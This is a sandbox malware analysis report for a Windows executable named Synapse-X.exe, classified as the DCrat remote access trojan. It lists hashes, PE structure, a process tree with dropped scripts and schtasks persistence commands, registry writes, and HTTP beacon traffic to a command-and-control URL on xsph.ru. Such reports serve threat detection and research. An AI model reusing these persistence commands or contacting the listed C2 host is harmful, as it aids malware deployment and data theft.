File name: | Synapse-X.exe |
Full analysis: | https://app.any.run/tasks/28f142b1-5bfc-4e2d-91ba-bab175ad4451 |
Verdict: | Malicious activity |
Threats: | DCrat, also known as Dark Crystal RAT, is a remote access trojan (RAT), which was first introduced in 2018. It is a modular malware that can be customized to perform different tasks. For instance, it can steal passwords, crypto wallet information, hijack Telegram and Steam accounts, and more. Attackers may use a variety of methods to distribute DCrat, but phishing email campaigns are the most common. |
Analysis date: | August 12, 2022, 17:13:14 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/x-dosexec |
File info: | PE32 executable (GUI) Intel 80386, for MS Windows |
MD5: | E588B605509B6B0171A09CDF688E1499 |
SHA1: | CA39D2A5ABA5DF9CEB94C7A346758FEA4005E8ED |
SHA256: | A1F7263481666C878066EADEB661EC6D7AD5257B5D2A084F670E56F97FC75662 |
SSDEEP: | 24576:i2G/nvxW3WwSqsJBnVFEM7DwMZJ+FcNnbd6UubVY2Xjt3oikB987UiMaw53Q6im2:ibA3eDJRVFEMDwMexxt3oxB9ri/6zim2 |
.exe | | | Win32 Executable (generic) (52.9) |
---|---|---|
.exe | | | Generic Win/DOS Executable (23.5) |
.exe | | | DOS Executable Generic (23.5) |
Subsystem: | Windows GUI |
---|---|
SubsystemVersion: | 5.1 |
ImageVersion: | - |
OSVersion: | 5.1 |
EntryPoint: | 0x1ec40 |
UninitializedDataSize: | - |
InitializedDataSize: | 445952 |
CodeSize: | 201216 |
LinkerVersion: | 14 |
PEType: | PE32 |
TimeStamp: | 2020:12:01 19:00:55+01:00 |
MachineType: | Intel 386 or later, and compatibles |
Architecture: | IMAGE_FILE_MACHINE_I386 |
---|---|
Subsystem: | IMAGE_SUBSYSTEM_WINDOWS_GUI |
Compilation Date: | 01-Dec-2020 18:00:55 |
Detected languages: |
|
Debug artifacts: |
|
Magic number: | MZ |
---|---|
Bytes on last page of file: | 0x0090 |
Pages in file: | 0x0003 |
Relocations: | 0x0000 |
Size of header: | 0x0004 |
Min extra paragraphs: | 0x0000 |
Max extra paragraphs: | 0xFFFF |
Initial SS value: | 0x0000 |
Initial SP value: | 0x00B8 |
Checksum: | 0x0000 |
Initial IP value: | 0x0000 |
Initial CS value: | 0x0000 |
Overlay number: | 0x0000 |
OEM identifier: | 0x0000 |
OEM information: | 0x0000 |
Address of NE header: | 0x00000118 |
Signature: | PE |
---|---|
Machine: | IMAGE_FILE_MACHINE_I386 |
Number of sections: | 6 |
Time date stamp: | 01-Dec-2020 18:00:55 |
Pointer to Symbol Table: | 0x00000000 |
Number of symbols: | 0 |
Size of Optional Header: | 0x00E0 |
Characteristics: |
|
Name | Virtual Address | Virtual Size | Raw Size | Charateristics | Entropy |
---|---|---|---|---|---|
.text | 0x00001000 | 0x000310EA | 0x00031200 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ | 6.70808 |
.rdata | 0x00033000 | 0x0000A612 | 0x0000A800 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ | 5.22174 |
.data | 0x0003E000 | 0x00023728 | 0x00001000 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 3.70882 |
.didat | 0x00062000 | 0x00000188 | 0x00000200 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 3.29825 |
.rsrc | 0x00063000 | 0x0005EFA8 | 0x0005F000 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ | 3.26357 |
.reloc | 0x000C2000 | 0x00002268 | 0x00002400 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ | 6.55486 |
Title | Entropy | Size | Codepage | Language | Type |
---|---|---|---|---|---|
1 | 5.25329 | 1875 | Latin 1 / Western European | English - United States | RT_MANIFEST |
2 | 3.92488 | 4264 | Latin 1 / Western European | Process Default Language | RT_ICON |
3 | 3.51636 | 9640 | Latin 1 / Western European | Process Default Language | RT_ICON |
4 | 3.37366 | 16936 | Latin 1 / Western European | Process Default Language | RT_ICON |
5 | 3.0076 | 67624 | Latin 1 / Western European | Process Default Language | RT_ICON |
6 | 2.81335 | 270376 | Latin 1 / Western European | Process Default Language | RT_ICON |
7 | 3.1586 | 482 | Latin 1 / Western European | English - United States | RT_STRING |
8 | 3.11685 | 460 | Latin 1 / Western European | English - United States | RT_STRING |
9 | 3.11236 | 440 | Latin 1 / Western European | English - United States | RT_STRING |
10 | 2.99727 | 326 | Latin 1 / Western European | English - United States | RT_STRING |
KERNEL32.dll |
USER32.dll (delay-loaded) |
gdiplus.dll |
PID | CMD | Path | Indicators | Parent process | |||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
2988 | "C:\Users\admin\AppData\Local\Temp\Synapse-X.exe" | C:\Users\admin\AppData\Local\Temp\Synapse-X.exe | Explorer.EXE | ||||||||||||
User: admin Integrity Level: MEDIUM Exit code: 0 Modules
| |||||||||||||||
3292 | "C:\Windows\System32\WScript.exe" "C:\containerproviderwinMonitornet\YBw7wehZE.vbe" | C:\Windows\System32\WScript.exe | — | Synapse-X.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Version: 5.8.7600.16385 Modules
| |||||||||||||||
1604 | "C:\Windows\System32\WScript.exe" "C:\containerproviderwinMonitornet\file.vbs" | C:\Windows\System32\WScript.exe | — | Synapse-X.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 Modules
| |||||||||||||||
3504 | C:\Windows\system32\cmd.exe /c ""C:\containerproviderwinMonitornet\zl43VDdzohZNYOxfaG6.bat" " | C:\Windows\system32\cmd.exe | — | Synapse-X.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
1308 | C:\Windows\system32\cmd.exe /c ""C:\containerproviderwinMonitornet\qfYwvUj1IL25WpZEYS26.bat" " | C:\Windows\system32\cmd.exe | — | WScript.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
1764 | "C:\containerproviderwinMonitornet\chainportPerf.exe" | C:\containerproviderwinMonitornet\chainportPerf.exe | cmd.exe | ||||||||||||
User: admin Integrity Level: MEDIUM Exit code: 0 Version: 1.1.1o Modules
| |||||||||||||||
3084 | schtasks.exe /create /tn "SearchIndexerS" /sc MINUTE /mo 10 /tr "'C:\containerproviderwinMonitornet\SearchIndexer.exe'" /f | C:\Windows\system32\schtasks.exe | — | wmiprvse.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
3320 | schtasks.exe /create /tn "SearchIndexer" /sc ONLOGON /tr "'C:\containerproviderwinMonitornet\SearchIndexer.exe'" /rl HIGHEST /f | C:\Windows\system32\schtasks.exe | — | wmiprvse.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Manages scheduled tasks Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
1492 | schtasks.exe /create /tn "SearchIndexerS" /sc MINUTE /mo 6 /tr "'C:\containerproviderwinMonitornet\SearchIndexer.exe'" /rl HIGHEST /f | C:\Windows\system32\schtasks.exe | — | wmiprvse.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Manages scheduled tasks Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
3388 | schtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 5 /tr "'C:\containerproviderwinMonitornet\wscript.exe'" /f | C:\Windows\system32\schtasks.exe | — | wmiprvse.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
|
(PID) Process: | (2988) Synapse-X.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
(PID) Process: | (2988) Synapse-X.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | IntranetName |
Value: 1 | |||
(PID) Process: | (2988) Synapse-X.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | UNCAsIntranet |
Value: 1 | |||
(PID) Process: | (2988) Synapse-X.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | AutoDetect |
Value: 0 | |||
(PID) Process: | (3292) WScript.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
(PID) Process: | (3292) WScript.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | IntranetName |
Value: 1 | |||
(PID) Process: | (3292) WScript.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | UNCAsIntranet |
Value: 1 | |||
(PID) Process: | (3292) WScript.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | AutoDetect |
Value: 0 | |||
(PID) Process: | (1764) chainportPerf.exe | Key: | HKEY_CURRENT_USER\Software\356ce7c432ee6efe9c8e8b7282c665c2150b68d0 |
Operation: | write | Name: | 4f877e793dcafea2e76326fb4761140cb447fe96 |
Value: WyJDOlxcY29udGFpbmVycHJvdmlkZXJ3aW5Nb25pdG9ybmV0XFxjaGFpbnBvcnRQZXJmLmV4ZSIsIkM6XFxjb250YWluZXJwcm92aWRlcndpbk1vbml0b3JuZXRcXFNlYXJjaEluZGV4ZXIuZXhlIiwiQzpcXGNvbnRhaW5lcnByb3ZpZGVyd2luTW9uaXRvcm5ldFxcd3NjcmlwdC5leGUiLCJDOlxcY29udGFpbmVycHJvdmlkZXJ3aW5Nb25pdG9ybmV0XFxsc20uZXhlIiwiQzpcXE1TT0NhY2hlXFxBbGwgVXNlcnNcXGV4cGxvcmVyLmV4ZSIsIkM6XFxNU09DYWNoZVxcQWxsIFVzZXJzXFxjdGZtb24uZXhlIiwiQzpcXE1TT0NhY2hlXFxBbGwgVXNlcnNcXHs5MDE0MDAwMC0wMEJBLTA0MTItMDAwMC0wMDAwMDAwRkYxQ0V9LUNcXGNzcnNzLmV4ZSIsIkM6XFxNU09DYWNoZVxcQWxsIFVzZXJzXFx7OTAxNDAwMDAtMDEwMS0wNDE5LTAwMDAtMDAwMDAwMEZGMUNFfS1DXFxTeXN0ZW0uZXhlIiwiQzpcXGNvbnRhaW5lcnByb3ZpZGVyd2luTW9uaXRvcm5ldFxcd2lubG9nb24uZXhlIiwiQzpcXE1TT0NhY2hlXFxBbGwgVXNlcnNcXHs5MDE0MDAwMC0wMDFBLTA0MTItMDAwMC0wMDAwMDAwRkYxQ0V9LUNcXFN5c3RlbS5leGUiLCJDOlxcY29udGFpbmVycHJvdmlkZXJ3aW5Nb25pdG9ybmV0XFxTZWFyY2hQcm90b2NvbEhvc3QuZXhlIiwiQzpcXGNvbnRhaW5lcnByb3ZpZGVyd2luTW9uaXRvcm5ldFxcc21zcy5leGUiLCJDOlxcV2luZG93c1xcZGVidWdcXFdJQVxcdGFza2VuZy5leGUiLCJDOlxcTVNPQ2FjaGVcXEFsbCBVc2Vyc1xcezkwMTQwMDAwLTAxMDAtMDQxMS0wMDAwLTAwMDAwMDBGRjFDRX0tQ1xcSU1FRElDVFVQREFURS5leGUiLCJDOlxcY29udGFpbmVycHJvdmlkZXJ3aW5Nb25pdG9ybmV0XFx3aW5pbml0LmV4ZSIsIkM6XFxNU09DYWNoZVxcQWxsIFVzZXJzXFx7OTAxNDAwMDAtMDAxQS0wNDFGLTAwMDAtMDAwMDAwMEZGMUNFfS1DXFxjc3Jzcy5leGUiLCJDOlxcTVNPQ2FjaGVcXEFsbCBVc2Vyc1xcdGFza2VuZy5leGUiLCJDOlxcY29udGFpbmVycHJvdmlkZXJ3aW5Nb25pdG9ybmV0XFxjc3Jzcy5leGUiLCJDOlxcY29udGFpbmVycHJvdmlkZXJ3aW5Nb25pdG9ybmV0XFxJZGxlLmV4ZSIsIkM6XFxNU09DYWNoZVxcQWxsIFVzZXJzXFx7OTAxNDAwMDAtMDEwMS0wQzBBLTAwMDAtMDAwMDAwMEZGMUNFfS1DXFxjc3Jzcy5leGUiXQ== | |||
(PID) Process: | (1764) chainportPerf.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | ProxyBypass |
Value: 1 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2988 | Synapse-X.exe | C:\containerproviderwinMonitornet\qfYwvUj1IL25WpZEYS26.bat | text | |
MD5:E197FD2BC79F39E36349D5A09CE1C0DA | SHA256:286980B36073257084984E9A2EBA1357CF1BF25C793348128F2765174D099D38 | |||
1764 | chainportPerf.exe | C:\containerproviderwinMonitornet\4a1145983886ca | text | |
MD5:033AA58E63BB879C8942FAC00487EACE | SHA256:62E62F44F25928DB9153EE7CC5BDAE487E2DFA1CE319B7CE9D5E880635E3C498 | |||
2988 | Synapse-X.exe | C:\containerproviderwinMonitornet\chainportPerf.exe | executable | |
MD5:7348C8F3302A008212D50836C92E07B7 | SHA256:9A227BAD0FC850E0271D3154F9A950A5587E631A287B074CC18016929B255461 | |||
1764 | chainportPerf.exe | C:\containerproviderwinMonitornet\wscript.exe | executable | |
MD5:7348C8F3302A008212D50836C92E07B7 | SHA256:9A227BAD0FC850E0271D3154F9A950A5587E631A287B074CC18016929B255461 | |||
1764 | chainportPerf.exe | C:\MSOCache\All Users\{90140000-0101-0419-0000-0000000FF1CE}-C\27d1bcfc3c54e0 | text | |
MD5:044A856019E838A275FE467AECB634FC | SHA256:245ED3AEAE9DB880C18F74EA9A34AA5232FDC09FD8ED97904186588D7956E61A | |||
1764 | chainportPerf.exe | C:\containerproviderwinMonitornet\817c8c8ec737a7 | text | |
MD5:6D0C81FC0E8D964B6E24D062D2EC03BE | SHA256:0C9E9802702896893E7888DBA6BF0B9F8E3A06E848E0F7D4E0AB2849747B7929 | |||
1764 | chainportPerf.exe | C:\containerproviderwinMonitornet\101b941d020240 | text | |
MD5:E9AED91D6D5B802635469BFD1B9276EA | SHA256:09FA093BBA27A741F74877C5E5FF3DD6852B6D4E39AFC988C65113EB49AE4B7A | |||
1764 | chainportPerf.exe | C:\MSOCache\All Users\{90140000-00BA-0412-0000-0000000FF1CE}-C\886983d96e3d3e | text | |
MD5:517FAD4E05BD7A4752A9481FA52D1116 | SHA256:F7153394992007BD0A8AB9A05938D9E2448F1C6807B920273C7240B39BBA5064 | |||
2988 | Synapse-X.exe | C:\containerproviderwinMonitornet\zl43VDdzohZNYOxfaG6.bat | text | |
MD5:DD9794AEAF627741D9020D7E3AB875DA | SHA256:8ADE9E51571D4AC3E60452D18E8B9DEBF92DD479D165606A4D4ED638EEAE1E7B | |||
1764 | chainportPerf.exe | C:\containerproviderwinMonitornet\lsm.exe | executable | |
MD5:7348C8F3302A008212D50836C92E07B7 | SHA256:9A227BAD0FC850E0271D3154F9A950A5587E631A287B074CC18016929B255461 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
1284 | System.exe | GET | — | 141.8.193.236:80 | http://f0707008.xsph.ru/phpSecureasynctempCdn.php?Q87zWAxhNc1L=DjMR&X9oFioUhy=J38Lq6d7xQt2kK5PLrY&f7785c5df7f03c0d2caf2606eda05dab=AOiVWMzYWYxU2N2ImMzM2N3kTMiNmYwEGOmZ2YxUmZzQWZkRzYiNGM3ATO1UjN0kTNzAzM4gzM&78944e2dd7ce106262f5ea04819b1571=AMmFDZ5UmZ5cjZxIWYxITNkdzNxMjZ1QmY4UmZiVWMhhDZhJjMwUDM&0937c7bd48c1c66f9d1e0e6185f90034=d1nI2AzNwkzNlJmM2ATM0UmNjV2Y0IGNhNzMxYDMhVmMyQzYyY2NygDO2IiOiQTNiZGZhdDNwYTZ5QmNzImZ5QTZlRTN2UjZyU2YwQmNiwiI0cjM0Y2MlNDM4QGOjFTZ0gzNlVjZiNGZzgDZwIWY2ImN5UDZ5UmYwIiOiEDNyQjNjR2MmFDZxUGO4ATNyYGZ5QGNzEjMzYGNlFWYis3W&e15ac3c90300a65a7efb4543f78b520e=QX9JiI6ICOiNGM0ITOzYDZ2MGZwUGNmFTN5MTMxkTNkNzYjRGZ4ICLiYDM3ATO3UmYyYDMxQTZ2MWZjRjY0E2MzEjNwEWZyIDNjJjZ3IDO4YjI6ICN1ImZkF2N0AjNllDZ2MjYmlDNlVGN1YTNmJTZjBDZ2ICLiQzNyQjZzU2MwgDZ4MWMlRDO3UWNmJ2YkNDOkBjYhZjY2kTNklTZiBjI6ISM0IDN2MGZzYWMkFTZ4gDM1IjZklDZ0MTMyMjZ0UWYhJyes0nIwglT2k0QkFTOXpFdsdkV3Z1VaNnTsl0cJNlWyw2RkpmRrlkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJl2TpN2MitWNXFGWSFTUCp0QMlGNrlkNJNlYo5UbZxGZxMGcKNETptGbJZTSTpVd5cUY3lTbjpGbXRles1WSzl0ULpXQ5pVdsd0Y3Z1RkRlQD5UNBNkYsJlMi5kQp50ZrhkYwFzVZdkQD5kMnh0Sn9GSThkQ65UdJRUSBJ0UWFlTFl0dBRkTyAzUOBnQTtkTSZ0Ssp0MiRkQTt0UoNkYsJlbipkSp9UaVdlYoVTVWFlTrl0cJN1SClTaU9WQpNGbSh0YoJ1VRdWTzkFcod0Yop0MSdWRwI1VCNkW5Z0RaVnRHRGVKl2TpV1VihWNVZVUktWSzlUaUl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJUaNpXQDJGa1IjYw50MjxmWyIWeCZUSzEUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3UmlGOyoFaOdVYv5EMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJlWT5dmaMNzaUx0cFRlTzQTeOpXSp9UaNJjYzp0QMlWTWZVavpWS1oESkVnVzImaKNETplUaPlGNyIGckdlW5p0QMlWSp9UarhEZw5UbJNXS51EN0M1TxQTeOBTSqxEMnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJlmYwFzRahmSp9UaVdlYoVzajxmTYZVa3lWSEJkVMNlVwUlVKl2TpV1VihWNwEVUKNETp1keNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOigjYjBDNykzM2QmNjRGMlRjZxUTOzETM5UDZzM2YkRGOiwiI2MDNmVGNkNDMyYzMwIjYjRGZ3IzMiRjMkRTO0IzMiFGOwcTO4QjNxIiOiQTNiZGZhdDNwYTZ5QmNzImZ5QTZlRTN2UjZyU2YwQmNiwiI0cjM0Y2MlNDM4QGOjFTZ0gzNlVjZiNGZzgDZwIWY2ImN5UDZ5UmYwIiOiEDNyQjNjR2MmFDZxUGO4ATNyYGZ5QGNzEjMzYGNlFWYis3W | RU | — | — | malicious |
1284 | System.exe | GET | — | 141.8.193.236:80 | http://f0707008.xsph.ru/phpSecureasynctempCdn.php?Q87zWAxhNc1L=DjMR&X9oFioUhy=J38Lq6d7xQt2kK5PLrY&f7785c5df7f03c0d2caf2606eda05dab=AOiVWMzYWYxU2N2ImMzM2N3kTMiNmYwEGOmZ2YxUmZzQWZkRzYiNGM3ATO1UjN0kTNzAzM4gzM&78944e2dd7ce106262f5ea04819b1571=AMmFDZ5UmZ5cjZxIWYxITNkdzNxMjZ1QmY4UmZiVWMhhDZhJjMwUDM&e15ac3c90300a65a7efb4543f78b520e=QX9JSUNJiOigjYjBDNykzM2QmNjRGMlRjZxUTOzETM5UDZzM2YkRGOiwiIlNjZyMGN2Q2YiZGZ3QGM2MjYmJWZ4MzN0YmMkJ2YmFjY4MWN2QGNiJiOiQTNiZGZhdDNwYTZ5QmNzImZ5QTZlRTN2UjZyU2YwQmNiwiI0cjM0Y2MlNDM4QGOjFTZ0gzNlVjZiNGZzgDZwIWY2ImN5UDZ5UmYwIiOiEDNyQjNjR2MmFDZxUGO4ATNyYGZ5QGNzEjMzYGNlFWYis3W | RU | — | — | malicious |
1284 | System.exe | GET | 200 | 141.8.193.236:80 | http://f0707008.xsph.ru/phpSecureasynctempCdn.php?UgFQrrKaSfzMNXUdqeIjlZAf=ZdJSdmJf0yX249PSg&363bbe2f2c10bcde4dcfd059aaf5a188=38b973380116c0096dfc620fa79b2496&78944e2dd7ce106262f5ea04819b1571=wY4UWMhNDN0kDMyUDZ2UjZkVTZyYzY2YmM4cDM0kTM4MGZ1kzY1ATN&UgFQrrKaSfzMNXUdqeIjlZAf=ZdJSdmJf0yX249PSg | RU | text | 2.06 Kb | malicious |
1284 | System.exe | GET | 200 | 141.8.193.236:80 | http://f0707008.xsph.ru/phpSecureasynctempCdn.php?Q87zWAxhNc1L=DjMR&X9oFioUhy=J38Lq6d7xQt2kK5PLrY&f7785c5df7f03c0d2caf2606eda05dab=AOiVWMzYWYxU2N2ImMzM2N3kTMiNmYwEGOmZ2YxUmZzQWZkRzYiNGM3ATO1UjN0kTNzAzM4gzM&78944e2dd7ce106262f5ea04819b1571=AMmFDZ5UmZ5cjZxIWYxITNkdzNxMjZ1QmY4UmZiVWMhhDZhJjMwUDM&25a9018383d414fe6ced6a8c64e3bf80=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 | RU | text | 2.06 Kb | malicious |
1284 | System.exe | POST | — | 141.8.193.236:80 | http://f0707008.xsph.ru/phpSecureasynctempCdn.php?Q87zWAxhNc1L=DjMR&X9oFioUhy=J38Lq6d7xQt2kK5PLrY&f7785c5df7f03c0d2caf2606eda05dab=AOiVWMzYWYxU2N2ImMzM2N3kTMiNmYwEGOmZ2YxUmZzQWZkRzYiNGM3ATO1UjN0kTNzAzM4gzM&78944e2dd7ce106262f5ea04819b1571=AMmFDZ5UmZ5cjZxIWYxITNkdzNxMjZ1QmY4UmZiVWMhhDZhJjMwUDM | RU | — | — | malicious |
1284 | System.exe | GET | — | 141.8.193.236:80 | http://f0707008.xsph.ru/phpSecureasynctempCdn.php?Q87zWAxhNc1L=DjMR&X9oFioUhy=J38Lq6d7xQt2kK5PLrY&f7785c5df7f03c0d2caf2606eda05dab=AOiVWMzYWYxU2N2ImMzM2N3kTMiNmYwEGOmZ2YxUmZzQWZkRzYiNGM3ATO1UjN0kTNzAzM4gzM&78944e2dd7ce106262f5ea04819b1571=AMmFDZ5UmZ5cjZxIWYxITNkdzNxMjZ1QmY4UmZiVWMhhDZhJjMwUDM&e15ac3c90300a65a7efb4543f78b520e=QX9JSUNJiOigjYjBDNykzM2QmNjRGMlRjZxUTOzETM5UDZzM2YkRGOiwiIlNjZyMGN2Q2YiZGZ3QGM2MjYmJWZ4MzN0YmMkJ2YmFjY4MWN2QGNiJiOiQTNiZGZhdDNwYTZ5QmNzImZ5QTZlRTN2UjZyU2YwQmNiwiI0cjM0Y2MlNDM4QGOjFTZ0gzNlVjZiNGZzgDZwIWY2ImN5UDZ5UmYwIiOiEDNyQjNjR2MmFDZxUGO4ATNyYGZ5QGNzEjMzYGNlFWYis3W | RU | — | — | malicious |
1284 | System.exe | POST | — | 141.8.193.236:80 | http://f0707008.xsph.ru/phpSecureasynctempCdn.php?Q87zWAxhNc1L=DjMR&X9oFioUhy=J38Lq6d7xQt2kK5PLrY&f7785c5df7f03c0d2caf2606eda05dab=AOiVWMzYWYxU2N2ImMzM2N3kTMiNmYwEGOmZ2YxUmZzQWZkRzYiNGM3ATO1UjN0kTNzAzM4gzM&78944e2dd7ce106262f5ea04819b1571=AMmFDZ5UmZ5cjZxIWYxITNkdzNxMjZ1QmY4UmZiVWMhhDZhJjMwUDM | RU | — | — | malicious |
